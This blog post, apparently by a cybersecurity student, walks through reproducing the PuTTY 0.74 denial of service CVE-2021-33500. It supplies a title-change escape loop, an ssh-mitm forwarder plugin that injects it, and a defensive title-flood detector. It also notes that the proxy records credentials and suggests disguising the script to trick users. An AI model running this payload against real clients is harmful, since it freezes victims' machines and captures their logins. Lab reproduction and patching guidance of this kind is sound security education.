PuTTY denial of service

Henry Tang
Jun 10, 2021

Introduction

PuTTY is an open source SSH and telnet client that is widely available and used by network administrators and students around the world. If you are reading this, you have probably used it in some form, whether briefly or extensively. Its uses are many: among them, generating SSH keys for connecting to remote machines and transferring files over SFTP.

This article discusses CVE-2021-33500, a vulnerability found in PuTTY version 0.74. It allows a remote (malicious) SSH server to cause a denial of service on the client machine running this version of PuTTY.

The exploit is rather simple: the remote server sends a command that makes the PuTTY terminal change its window title repeatedly. The terminal, and with it the GUI of the machine it runs on, freezes entirely, denying the user(s) access to the machine, whether it is a workstation or a server.

Machine setup

To reproduce this vulnerability you will need two machines: a Windows 10 machine with PuTTY version 0.74 installed, and an attacking machine, which can be another Windows machine or a Linux machine. I would suggest Kali Linux, since it ships with a wide array of tools.

You can download PuTTY here. Here are also some links to download a virtual machine for either VMware or VirtualBox.

The Windows 10 machine may need Defender disabled for the payload to work, although I was able to get it to function without doing so.

You will also need a tool called ssh-mitm, a great pentesting tool for session hijacking among other things. It creates a proxy SSH server to which the PuTTY client connects; the proxy then delivers the payload that freezes the Windows 10 machine, completing the denial of service.

To install ssh-mitm you first need the pip Python package manager. If you have Python 2 or Python 3 installed, pip should already be present; you can check by running the following command:

$ python -m pip --version
pip X.Y.Z from .../site-packages/pip (python X.Y)

If you need to install pip you can use this link to download it, or fetch the installer with curl:

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

and then run the following command to install it:

python get-pip.py

Once pip is installed you can install the ssh-mitm tool with:

$ python -m pip install ssh-mitm

Payload

A simple command that triggers this vulnerability is:

$ PS1=''
echo -ne "\033]0; NEW_TITLE \007"

The command above changes the terminal window's title once (an OSC "set title" escape sequence, terminated by BEL). To change it repeatedly, you can run a loop like the one below:

$ PS1=''
while :
> do
> echo -ne "\033]0; NEW_TITLE${RANDOM} \007"
> done

I searched around for a payload that fits this CVE and found the following script (a forwarder plugin for ssh-mitm):

from ssh_proxy_server.forwarders.ssh import SSHForwarder


class SSHPuttyDoSForwarder(SSHForwarder):
    """PuTTY < 0.75: DoS on Windows/Linux clients

    Security fix: a server could DoS the whole Windows/Linux GUI by telling
    the PuTTY window to change its title repeatedly at high speed.

    PuTTY-Changelog: https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html
    """

    def __init__(self, session):
        super().__init__(session)
        # Shell lines sent into the forwarded session: an endless loop that
        # emits an OSC "set title" sequence (ESC ] 0 ; title BEL) each pass.
        self.exploit = [
            "PS1=''",
            "while :",
            "do",
            "echo -ne '\\033]0; NEW_TITLE${RANDOM} \\007'",
            "done"
        ]
        self.executed = False

    def forward_extra(self):
        # Inject the payload exactly once per session.
        if not self.executed:
            self.server_channel.sendall('\n'.join(self.exploit) + '\n')
            self.executed = True

I then modified the script to fit my scope and gave it an obscure name (which I would recommend you do as well).
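The defender's side of the same sequence, as an added example that is not part of the original post or of ssh-mitm: a small stream monitor (hypothetical names, placed in a terminal emulator or a logging SSH proxy) that recognises the OSC 0/2 title-change sequences the loop above emits, counts them, strips them, and flags a burst above a threshold as the CVE-2021-33500 pattern. It handles sequences split across read chunks, which a real proxy sees constantly.

```python
import re

# OSC 0 / OSC 2 "set window title": ESC ] 0 ; <title> BEL  (or ESC \ as terminator).
OSC_TITLE = re.compile(rb'\x1b\][02];[^\x07\x1b]*(?:\x07|\x1b\\)')
TERMINATOR = re.compile(rb'\x07|\x1b\\')


class TitleChangeMonitor:
    """Counts (and optionally strips) title-change sequences in a byte stream.

    Hypothetical defender-side filter: a burst of title changes above
    `threshold` is the title-flood DoS pattern, not a normal prompt update.
    """

    def __init__(self, threshold=100, strip=True):
        self.threshold = threshold
        self.strip = strip
        self.count = 0
        self._pending = b''   # unterminated sequence held back between chunks

    def feed(self, chunk: bytes) -> bytes:
        data = self._pending + chunk
        cut = len(data)
        start = data.rfind(b'\x1b]')
        if start != -1 and not TERMINATOR.search(data, start):
            cut = start                 # OSC started but not yet terminated
        elif data.endswith(b'\x1b'):
            cut = len(data) - 1         # lone ESC may be the start of one
        data, self._pending = data[:cut], data[cut:]
        if len(self._pending) > 4096:   # never-terminated OSC: do not buffer forever
            self._pending = b''
        self.count += len(OSC_TITLE.findall(data))
        return OSC_TITLE.sub(b'', data) if self.strip else data

    @property
    def flood_detected(self) -> bool:
        return self.count >= self.threshold


def simulate_payload(n: int) -> bytes:
    """Constructed output of the page's `while :` loop after n iterations."""
    return b''.join(b'\x1b]0; NEW_TITLE%d \x07' % i for i in range(n))


if __name__ == '__main__':
    mon = TitleChangeMonitor(threshold=100)
    cleaned = mon.feed(simulate_payload(250))
    print(mon.count, mon.flood_detected, cleaned)   # 250 True b''
```

A legitimate shell prompt sets the title once per command, so a single change passes through while a flood of hundreds is counted, stripped and reported.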

Attack

Once your machines are set up, the attack can proceed. On the attacking machine, launch the ssh-mitm server:

Afterwards, boot the Windows 10 machine and run PuTTY to connect to the ssh-mitm machine. On connecting you will receive a host key warning from PuTTY; select Yes to continue the connection:

The hostname is the IP of the machine to connect to, along with port 10022, which ssh-mitm is listening on

Once the connection is made you will see confirmation on the attacking machine. Because the session passes through the ssh-mitm proxy, the username and password are recorded as well, along with other useful session information, should they be needed later. From here we could choose other forms of attack such as session hijacking, but here we are going to have the PuTTY client run the script to lock up the Windows machine.

This is just a sample; make sure to give it a more obscure name. We can trick the user into thinking it is a useful or needed file, for example.

A mirror shell is also created on connection, as you can see here:

Once it is created you can navigate the terminal to the script

From here, navigate to the location of your script, run it, and watch as the VM becomes unresponsive.

Remediation

So now we have gone through the attack, but what about remediation? Fortunately, this was caught, and the PuTTY developers have released version 0.75, which corrects the issue; I have tested it and the attack no longer works against that version. I have also since updated the copy of PuTTY I use professionally.

Final Thoughts

PuTTY is a simple and useful open source tool for diagnostics, but in the hands of an adversary it can be used to affect one of the pillars of the CIA triad: Availability. With this published CVE, an attacker can take advantage of an unpatched installation of this software to take systems offline. It is important that other professionals become aware of this and update their versions, since updating simple open source tools like this one so often becomes an afterthought.

Henry Tang, cybersecurity student at Mount Hood Community College